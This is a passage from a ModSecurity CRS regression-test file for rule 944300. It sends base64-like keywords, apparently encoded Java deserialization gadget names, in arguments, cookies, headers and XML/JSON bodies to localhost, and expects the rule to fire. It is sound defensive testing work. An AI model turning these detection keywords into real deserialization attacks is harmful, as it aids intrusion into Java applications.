"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-276 - desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-277 - desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-278 - desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-279 - desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-280 - desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-281 - desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-282 - desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-283 - desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-284 - desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-285 - desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-286 - desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-287 - desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-288 - desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-289 - desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-290 - desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-291 - desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-292 - desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-293 - desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-294 - desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-295 - desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-296 - desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-297 - desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-298 - desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-299 - desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-300 - desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-301 - desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-302 - desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-303 - desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-304 - desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-305 - desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-306 - desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-307 - desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-308 - desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-309 - desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-310 - desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-311 - desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-312 - desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-313 - desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-314 - desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-315 - desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-316 - desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: 